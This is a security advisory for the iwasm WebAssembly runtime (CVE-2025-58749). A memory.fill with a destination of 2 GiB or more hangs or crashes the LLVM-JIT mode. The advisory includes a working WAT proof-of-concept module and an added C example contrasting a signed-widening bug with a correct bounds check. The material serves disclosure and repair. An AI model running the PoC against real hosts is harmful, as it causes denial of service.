
When `address >= 2GiB` in `memory.fill`, `iwasm` cannot exit normally in `LLVM-JIT` mode.

Moderate
lum1n0us published GHSA-xj5p-r8jq-pw47 Sep 16, 2025

Package

iwasm

Affected versions

2.4.1

Patched versions

2.4.2

Description

Summary

Details

In LLVM_JIT mode, iwasm does not terminate properly when it executes a wasm program containing a specific memory.fill case. The same program runs and exits normally under FAST_JIT mode and the other execution modes.

The program executes a memory.fill instruction whose first operand, the destination offset of the region to fill, is greater than or equal to 2 GiB (2147483648 bytes). With a destination below 2 GiB the program exits normally. Note that 2147483648 is 2^31, the smallest i32 value whose sign bit is set.

Note: the region touched by the memory.fill in this case lies entirely inside the module's linear memory (57491 pages is roughly 3.5 GiB), so this is not a legitimate out-of-bounds access; if the region extended past the end of memory, an "out of bounds memory access" trap would be the expected result.

PoC

(module
  (type (;0;) (func (param i32)))
  (type (;1;) (func))
  (type (;2;) (func (result i32)))
  (import "wasi_snapshot_preview1" "proc_exit" (func (;0;) (type 0)))
  (func (;1;) (type 1))
  (func (;2;) (type 1)
    (local i32)
    ;; memory.fill operands: destination offset, byte value, length
    (memory.fill
      (i32.const 2147483648)   ;; dst = 2 GiB (2^31), still inside the 57491-page memory
      (i32.const 217)          ;; fill byte
      (i32.const 1))           ;; length: a single byte
    (call 0
      (i32.const 0))           ;; proc_exit(0): the expected normal exit
    (unreachable))
  (table (;0;) 2 2 funcref)
  (memory (;0;) 57491 57491)   ;; 57491 * 64 KiB, well above the 2 GiB destination
  (global (;0;) (mut i32) (i32.const 66576))
  (export "memory" (memory 0))
  (export "__indirect_function_table" (table 0))
  (export "_start" (func 2))
  (elem (;0;) (i32.const 1) func 1))

The issue reproduces whenever the first operand (the destination offset) of memory.fill is >= 2 GiB; build the module with a memory large enough that the fill stays in bounds, run it with iwasm in LLVM-JIT mode, and observe that the process never reaches proc_exit.

Impact

This is caused by a bug in the runtime that leads to an invalid pointer being accessed when memory.fill is executed with a destination at or above 2 GiB. A release build of iwasm hangs; a debug build crashes. Because the wasm-level access is in bounds, a module that the runtime should execute to completion instead fails to terminate, which is a denial of service against the host embedding iwasm in LLVM-JIT mode.
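The advisory does not state the root cause, but the 2^31 threshold is the point at which a 32-bit offset's sign bit becomes set, which is where any address translation that reinterprets the unsigned i32 destination as a signed value starts producing negative displacements. The following is an added C example, not WAMR's code, that models that class of defect beside a spec-conformant memory.fill bounds check: `buggy_displacement` is a hypothetical translation that goes through `int32_t`, `memory_fill_in_bounds` does the check the spec requires in 64-bit arithmetic, and `wasm_memory_fill` uses it. The `linear_mem` type, the 1-page self-check in `demo_fill_roundtrip`, and the page counts used in `main` are assumptions made for the illustration (the 57491 pages and the 2 GiB destination are taken from the PoC).

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define WASM_PAGE_SIZE 65536ULL

/* Toy model of a 32-bit wasm linear memory (illustration, not WAMR's type). */
typedef struct {
    uint8_t *base;
    uint64_t size; /* bytes; at most 65536 pages = 4 GiB */
} linear_mem;

/*
 * Hypothetical buggy translation of the i32 destination operand: the offset
 * is reinterpreted as a signed 32-bit value before being widened to pointer
 * width. For dst < 2^31 this is harmless; for dst >= 2^31 the displacement
 * is negative and base + displacement lands outside the module's memory even
 * though the wasm-level range is valid. This only illustrates the kind of
 * defect that produces a 2 GiB threshold; it is not WAMR's actual code.
 * (The cast relies on two's-complement wraparound, which every mainstream
 * compiler provides.)
 */
int64_t buggy_displacement(uint32_t dst)
{
    int32_t signed_dst = (int32_t)dst;
    return (int64_t)signed_dst;
}

/*
 * Bounds check for memory.fill as the spec requires: dst and n are unsigned
 * i32 values, and the sum is formed in 64 bits so dst + n cannot wrap.
 * n == 0 with dst == size is allowed; dst + n > size must trap.
 */
bool memory_fill_in_bounds(uint64_t mem_size, uint32_t dst, uint32_t n)
{
    uint64_t end = (uint64_t)dst + (uint64_t)n;
    return end <= mem_size;
}

/* memory.fill: returns 0 on success, -1 to signal an out-of-bounds trap. */
int wasm_memory_fill(linear_mem *m, uint32_t dst, uint32_t val, uint32_t n)
{
    if (!memory_fill_in_bounds(m->size, dst, n))
        return -1;
    /* dst is widened as an unsigned value, so the pointer stays in [base, base + size). */
    memset(m->base + (uint64_t)dst, (uint8_t)val, (size_t)n);
    return 0;
}

/*
 * Self-check on a 1-page memory (kept small so it runs anywhere): a fill
 * inside the page writes exactly [dst, dst + n); a fill that crosses the end
 * traps without touching memory; a zero-length fill at the end is allowed.
 * Returns 0 when every check passes, otherwise the number of the failed check.
 */
int demo_fill_roundtrip(void)
{
    linear_mem m;
    m.size = WASM_PAGE_SIZE;
    m.base = calloc((size_t)m.size, 1);
    if (!m.base)
        return 1;

    int rc = 0;
    if (wasm_memory_fill(&m, 100, 217, 4) != 0)
        rc = 2;
    else if (m.base[99] != 0 || m.base[100] != 217 || m.base[103] != 217 || m.base[104] != 0)
        rc = 3;
    else if (wasm_memory_fill(&m, 65535, 217, 2) != -1)
        rc = 4; /* crosses the end of memory: must trap */
    else if (m.base[65535] != 0)
        rc = 5; /* a trapping fill must not write anything */
    else if (wasm_memory_fill(&m, 65536, 217, 0) != 0)
        rc = 6; /* zero-length fill at dst == size is permitted */

    free(m.base);
    return rc;
}

int main(void)
{
    /* The PoC's configuration: 57491 pages, destination 2 GiB, length 1. */
    uint64_t poc_mem = 57491ULL * WASM_PAGE_SIZE;
    uint32_t poc_dst = 2147483648u;
    printf("memory size: %llu bytes\n", (unsigned long long)poc_mem);
    printf("spec bounds check for dst=%u n=1: %s\n", poc_dst,
           memory_fill_in_bounds(poc_mem, poc_dst, 1) ? "in bounds" : "trap");
    printf("signed-widening displacement for dst=%u: %lld\n", poc_dst,
           (long long)buggy_displacement(poc_dst));
    printf("1-page self-check: %d\n", demo_fill_roundtrip());
    return 0;
}
```

The point of the contrast is that a correct implementation never narrows the destination through a signed type and never forms `dst + n` in 32 bits: both the PoC's destination (2 GiB into a 3.5 GiB memory) and a destination of 0xFFFFFFFF with a length of 2 are decided correctly only when the arithmetic is unsigned and 64-bit wide.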

Severity

Moderate

CVE ID

CVE-2025-58749

Weaknesses

No CWEs

Credits